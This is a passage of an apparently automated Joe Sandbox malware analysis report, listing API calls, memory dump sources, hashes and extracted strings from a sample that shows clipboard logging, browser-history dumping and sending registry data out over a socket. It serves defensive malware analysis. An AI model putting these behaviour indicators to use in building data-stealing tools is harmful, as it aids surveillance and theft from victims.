                                                                                                                                                                • Sleep.KERNEL32(000001F4), ref: 0006A113
                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 0006A19C
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$SleepText$ForegroundLength
                                                                                                                                                                • String ID: [ $ ]
                                                                                                                                                                • API String ID: 3309952895-93608704
                                                                                                                                                                • Opcode ID: b2790aef19af5318a4e8e023e0b758c1979fa71da6f5606fe6ae692c914ca2ac
                                                                                                                                                                • Instruction ID: d5e375abf683a9a53e1d146eb35adc83c68505baeed285ca6d473ae6b4b4d601
                                                                                                                                                                • Opcode Fuzzy Hash: b2790aef19af5318a4e8e023e0b758c1979fa71da6f5606fe6ae692c914ca2ac
                                                                                                                                                                • Instruction Fuzzy Hash: 8711CD316042005BD618F764DC139EFB3AAAF82310F90052DF99227193EE65AE098AD3
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 9495fa8793fbfea44a21c297e6d54179153ac60736f7f1f570da0e5f685701b0
                                                                                                                                                                • Instruction ID: 49b2b1d1221fc9626da8873d2da0017400b7838a9f29bee430b316771785c672
                                                                                                                                                                • Opcode Fuzzy Hash: 9495fa8793fbfea44a21c297e6d54179153ac60736f7f1f570da0e5f685701b0
                                                                                                                                                                • Instruction Fuzzy Hash: 4301F2B260560A3EF66016F86CC0FAB638DEF537B8B300325F620611D2DB359D108520
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: bc21e8ad858329a0cd7f0cd73341d970f392b2e86f8b2f45ab84f976a709a250
                                                                                                                                                                • Instruction ID: 494716e043255806688feca0df13b5126884af28580258510e7aab230991e8a5
                                                                                                                                                                • Opcode Fuzzy Hash: bc21e8ad858329a0cd7f0cd73341d970f392b2e86f8b2f45ab84f976a709a250
                                                                                                                                                                • Instruction Fuzzy Hash: B401D6B2A09A1A7EFA6056F86CC1DAB629DEF533B43200725F431611D1DF348D004960
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
                                                                                                                                                                • GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3177248105-0
                                                                                                                                                                • Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                                                                                                • Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
                                                                                                                                                                • Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                                                                                                • Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0
                                                                                                                                                                APIs
                                                                                                                                                                • ___BuildCatchObject.LIBVCRUNTIME ref: 02585590
                                                                                                                                                                  • Part of subcall function 02585BC8: ___BuildCatchObjectHelper.LIBVCRUNTIME ref: 02585BF7
                                                                                                                                                                  • Part of subcall function 02585BC8: ___AdjustPointer.LIBCMT ref: 02585C12
                                                                                                                                                                • _UnwindNestedFrames.LIBCMT ref: 025855A7
                                                                                                                                                                • ___FrameUnwindToState.LIBVCRUNTIME ref: 025855B9
                                                                                                                                                                • CallCatchBlock.LIBVCRUNTIME ref: 025855DD
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_2550000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2901542994-0
                                                                                                                                                                • Opcode ID: f84ef832e447a592ef24d677404c7af905c0307425b84c490414221a8babb987
                                                                                                                                                                • Instruction ID: 648d9f53a9bbff7f0025b7f660ecc6261b4b5a83065083e3b33939728007bbe4
                                                                                                                                                                • Opcode Fuzzy Hash: f84ef832e447a592ef24d677404c7af905c0307425b84c490414221a8babb987
                                                                                                                                                                • Instruction Fuzzy Hash: 3F01D73210010ABBCF126F55CC04EDA3BAAFF89754F464015FD5875120E7B6E961DFA8
                                                                                                                                                                APIs
                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0255CB22
                                                                                                                                                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0255CB61
                                                                                                                                                                  • Part of subcall function 02582A4E: _Yarn.LIBCPMT ref: 02582A6D
                                                                                                                                                                  • Part of subcall function 02582A4E: _Yarn.LIBCPMT ref: 02582A91
                                                                                                                                                                • std::bad_exception::bad_exception.LIBCMT ref: 0255CB79
                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0255CB87
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_2550000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throwstd::bad_exception::bad_exception
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3706160523-0
                                                                                                                                                                APIs
                                                                                                                                                                • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,6FEA1694,00000000,00000001,00000000,?,?,6FE9CFF6,?,00000000,00000000), ref: 6FEA21FA
                                                                                                                                                                • GetLastError.KERNEL32(?,6FEA1694,00000000,00000001,00000000,?,?,6FE9CFF6,?,00000000,00000000,?,?,?,6FE9D599,00000000), ref: 6FEA2206
                                                                                                                                                                  • Part of subcall function 6FEA21CC: CloseHandle.KERNEL32(FFFFFFFE,6FEA2216,?,6FEA1694,00000000,00000001,00000000,?,?,6FE9CFF6,?,00000000,00000000,?,?), ref: 6FEA21DC
                                                                                                                                                                • ___initconout.LIBCMT ref: 6FEA2216
                                                                                                                                                                  • Part of subcall function 6FEA218E: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6FEA21BD,6FEA1681,?,?,6FE9CFF6,?,00000000,00000000,?), ref: 6FEA21A1
                                                                                                                                                                • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,6FEA1694,00000000,00000001,00000000,?,?,6FE9CFF6,?,00000000,00000000,?), ref: 6FEA222B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2744216297-0
                                                                                                                                                                APIs
                                                                                                                                                                • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 025844F9
                                                                                                                                                                • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 025844FE
                                                                                                                                                                • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 02584503
                                                                                                                                                                  • Part of subcall function 02587906: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 02587917
                                                                                                                                                                • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 02584518
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_2550000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1761009282-0
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_2550000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: __aulldvrm
                                                                                                                                                                • String ID: +$-
                                                                                                                                                                • API String ID: 1302938615-2137968064
                                                                                                                                                                Strings
                                                                                                                                                                • Box<dyn Any><unnamed>, xrefs: 6FE7A432
                                                                                                                                                                • cannot access a Thread Local Storage value during or after destructionlibrary\std\src\thread\local.rs, xrefs: 6FE7A6D9, 6FE7A713, 6FE7A732
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: Box<dyn Any><unnamed>$cannot access a Thread Local Storage value during or after destructionlibrary\std\src\thread\local.rs
                                                                                                                                                                • API String ID: 0-3513654867
                                                                                                                                                                APIs
                                                                                                                                                                • _free.LIBCMT ref: 1000655C
                                                                                                                                                                  • Part of subcall function 100062BC: IsProcessorFeaturePresent.KERNEL32(00000017,100062AB,00000000,?,?,?,?,00000016,?,?,100062B8,00000000,00000000,00000000,00000000,00000000), ref: 100062BE
                                                                                                                                                                  • Part of subcall function 100062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 100062E0
                                                                                                                                                                  • Part of subcall function 100062BC: TerminateProcess.KERNEL32(00000000), ref: 100062E7
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                                                                • String ID: *?$.
                                                                                                                                                                • API String ID: 2667617558-3972193922
                                                                                                                                                                APIs
                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(00000000,?,00000000,00020019,?), ref: 0007209E
                                                                                                                                                                  • Part of subcall function 00071DB1: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00071E18
                                                                                                                                                                  • Part of subcall function 00071DB1: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00071E47
                                                                                                                                                                  • Part of subcall function 00064BE3: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00064C56
                                                                                                                                                                • RegCloseKey.ADVAPI32(?,000C2774,000C2774,000C8878,000C8878,00000071), ref: 000721F2
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseEnumInfoOpenQuerysend
                                                                                                                                                                • String ID: P%
                                                                                                                                                                • API String ID: 3114080316-96427000
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: <
                                                                                                                                                                • API String ID: 0-4251816714
                                                                                                                                                                APIs
                                                                                                                                                                • EncodePointer.KERNEL32(00000000,?), ref: 6FE94860
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: EncodePointer
                                                                                                                                                                • String ID: MOC$RCC
                                                                                                                                                                • API String ID: 2118026453-2084237596
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0006418F
                                                                                                                                                                  • Part of subcall function 00079B58: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,000641A5), ref: 00079B7F
                                                                                                                                                                  • Part of subcall function 0007689B: CloseHandle.KERNEL32(0006421E,?,?,0006421E,000C2544), ref: 000768B1
                                                                                                                                                                  • Part of subcall function 0007689B: CloseHandle.KERNEL32(000C2544,?,?,0006421E,000C2544), ref: 000768BA
                                                                                                                                                                  • Part of subcall function 0007A6EF: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,00000000,00000000,?,0006A3E4), ref: 0007A70C
                                                                                                                                                                • Sleep.KERNEL32(000000FA,000C2544), ref: 00064261
                                                                                                                                                                Strings
                                                                                                                                                                • /sort "Visit Time" /stext ", xrefs: 000641DB
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                                                                                                • String ID: /sort "Visit Time" /stext "
                                                                                                                                                                • API String ID: 368326130-1573945896
                                                                                                                                                                APIs
                                                                                                                                                                • getaddrinfo.WS2_32(?,00000000,?,?), ref: 6FE7F863
                                                                                                                                                                • WSAGetLastError.WS2_32 ref: 6FE7F870
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLastgetaddrinfo
                                                                                                                                                                • String ID: tzo
                                                                                                                                                                • API String ID: 4160901379-1584091749
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00092100: __onexit.LIBCMT ref: 00092106
                                                                                                                                                                • __Init_thread_footer.LIBCMT ref: 0006B347
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Init_thread_footer__onexit
                                                                                                                                                                • String ID: [End of clipboard]$[Text copied to clipboard]
                                                                                                                                                                • API String ID: 1881088180-3686566968
                                                                                                                                                                APIs
                                                                                                                                                                • GetLocalTime.KERNEL32(0007400C,000D2568,00000000,?,?,?,?,?,?,0007400C,?,00000001,0000004C,00000000), ref: 00065145
                                                                                                                                                                  • Part of subcall function 000797D0: GetLocalTime.KERNEL32(00000000), ref: 000797EA
                                                                                                                                                                • GetLocalTime.KERNEL32(0007400C,000D2568,00000000,?,?,?,?,?,?,0007400C,?,00000001,0000004C,00000000), ref: 0006519D
                                                                                                                                                                Strings
                                                                                                                                                                • KeepAlive | Enabled | Timeout: , xrefs: 0006513A
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LocalTime
                                                                                                                                                                • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                                                                • API String ID: 481472006-1507639952
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _strlen
                                                                                                                                                                • String ID: : $Se.
                                                                                                                                                                • API String ID: 4218353326-4089948878
                                                                                                                                                                • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                                                                • Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
                                                                                                                                                                • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                                                                • Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765
                                                                                                                                                                APIs
                                                                                                                                                                • _fwprintf.LIBCONCRTD ref: 6FE8DCC4
                                                                                                                                                                  • Part of subcall function 6FE8DF70: _fread.LIBCMTD ref: 6FE8DF8A
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _fread_fwprintf
                                                                                                                                                                • String ID: $%02x
                                                                                                                                                                • API String ID: 2879884958-2181446322
                                                                                                                                                                • Opcode ID: 0e67fd306d4e7e4a6a531ba49e769a6e9b50fa24c08fb0cdd953caeb7b0d84e5
                                                                                                                                                                • Instruction ID: cf81bc738dd1fd51750e041ae066f8533fd0e218b50219279eedd59886ee307c
                                                                                                                                                                • Opcode Fuzzy Hash: 0e67fd306d4e7e4a6a531ba49e769a6e9b50fa24c08fb0cdd953caeb7b0d84e5
                                                                                                                                                                • Instruction Fuzzy Hash: 86115174D04208ABDF24DFA8C450B9D7FB2AF40308F2481AEE9199B341D775AA51DB82
                                                                                                                                                                APIs
                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
